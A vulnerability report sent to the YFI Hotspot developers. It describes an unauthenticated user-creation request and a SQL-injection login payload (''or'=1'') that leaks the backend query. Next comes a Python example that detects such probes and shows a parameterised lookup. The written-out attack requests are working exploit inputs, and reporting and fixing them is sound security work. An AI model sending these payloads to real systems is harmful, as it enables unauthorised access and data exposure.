Hello YFI Team,
My name is Mohamed Khaled Fathy [Web Application Security Researcher] from Egypt.
I've found a vulnerability in YFI Hotspot; maybe this bug is a critical bug.
URL : http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/?
POST Data :
username=123pp&password=matrix&name=&surname=&address=&phone=&email=&active=on&language=4a80e849-5300-46b5-9b64-4ba1a509ff00&realm=4ee90242-50bc-4905-bb49-03c80a010001&profile=54117885-4604-40c6-aeb7-05d90a010001&cap=hard
When I perform session hijacking I can create a new user in this network.
Also I found an error in the database; it is leaking the contents of the database system.
Go to [ http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/? ]
URL : http://10.1.0.1/c2/yfi_cake/users/login
POST Data :
_method=POST&data%5BUser%5D%5Busername%5D=%27or%27%3D1%27&data%5BUser%5D%5Bpassword%5D=%27or%27%3D1%27
You can see:
SELECT User.id, User.username, User.password, User.name, User.surname, User.address, User.phone, User.email, User.active, User.cap, User.data, User.time, User.group_id, User.radcheck_id, User.profile_id, User.user_id, User.realm_id, User.language_id, User.created, User.modified,
       Group.id, Group.name, Group.created, Group.modified,
       Profile.id, Profile.name, Profile.template_id, Profile.created, Profile.modified,
       Creator.id, Creator.username, Creator.password, Creator.name, Creator.surname, Creator.address, Creator.phone, Creator.email, Creator.active, Creator.cap, Creator.data, Creator.time, Creator.group_id, Creator.radcheck_id, Creator.profile_id, Creator.user_id, Creator.realm_id, Creator.language_id, Creator.created, Creator.modified,
       Radcheck.id, Radcheck.username, Radcheck.attribute, Radcheck.op, Radcheck.value,
       Realm.id, Realm.name, Realm.append_string_to_user, Realm.icon_file_name, Realm.phone, Realm.fax, Realm.cell, Realm.email, Realm.url, Realm.address, Realm.created, Realm.modified,
       Language.id, Language.name, Language.iso_name, Language.created, Language.modified
FROM users AS User
LEFT JOIN groups AS Group ON (User.group_id = Group.id)
LEFT JOIN profiles AS Profile ON (User.profile_id = Profile.id)
LEFT JOIN users AS Creator ON (User.user_id = Creator.id)
LEFT JOIN radcheck AS Radcheck ON (User.radcheck_id = Radcheck.id AND Attribute = 'Cleartext-Password')
LEFT JOIN realms AS Realm ON (User.realm_id = Realm.id)
LEFT JOIN languages AS Language ON (User.language_id = Language.id)
WHERE User.username = '\'or\'=1\'' AND User.password = '6b413612c9b4cd979581aead27d728e406f3feba' LIMIT 1
Information leakage from the database.
Anonymous
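As an added example (not code from the report, nor from the YFI project): the helpers below decode the login POST body quoted above, flag the injection-style values at the input boundary so a defender can log or reject them, and show the bound-parameter form of the WHERE clause visible in the leaked query, where the value can only ever be compared as the literal string the dump shows. The probe pattern list and the plain SHA-1 password hashing are assumptions made for the example.

```python
import hashlib
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample: the raw login POST body quoted in the report above.
LOGIN_BODY = ("_method=POST&data%5BUser%5D%5Busername%5D=%27or%27%3D1%27"
              "&data%5BUser%5D%5Bpassword%5D=%27or%27%3D1%27")

# Assumed rule set: strings typical of SQL-injection probing in a login field.
SQLI_PROBE = re.compile(r"'\s*or\s*'?\s*=|--|/\*|\bunion\s+select\b", re.IGNORECASE)


def decode_cake_form(body):
    """Decode a CakePHP 'data[Model][field]' form body into {'Model.field': value}."""
    fields = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        match = re.fullmatch(r"data\[(\w+)\]\[(\w+)\]", key)
        if match:
            fields[f"{match.group(1)}.{match.group(2)}"] = values[0]
    return fields


def flag_probes(fields):
    """Return the names of fields whose value looks like an injection probe."""
    return sorted(name for name, value in fields.items() if SQLI_PROBE.search(value))


def login_lookup(username, password):
    """Bound-parameter version of the WHERE clause seen in the leaked query.

    The submitted value travels as data, never as SQL text. Assumption for this
    example: the stored password is a plain SHA-1 digest (the dump shows a 40-hex value).
    """
    conn = sqlite3.connect(":memory:")  # constructed in-memory users table
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)",
                 (hashlib.sha1(b"constructed-secret").hexdigest(),))
    digest = hashlib.sha1(password.encode()).hexdigest()
    row = conn.execute("SELECT id FROM users WHERE username = ? AND password = ? LIMIT 1",
                       (username, digest)).fetchone()
    conn.close()
    return row


if __name__ == "__main__":
    fields = decode_cake_form(LOGIN_BODY)
    print("flagged fields:", flag_probes(fields))
    print("probe login:", login_lookup(fields["User.username"], fields["User.password"]))
    print("real login:", login_lookup("admin", "constructed-secret"))
```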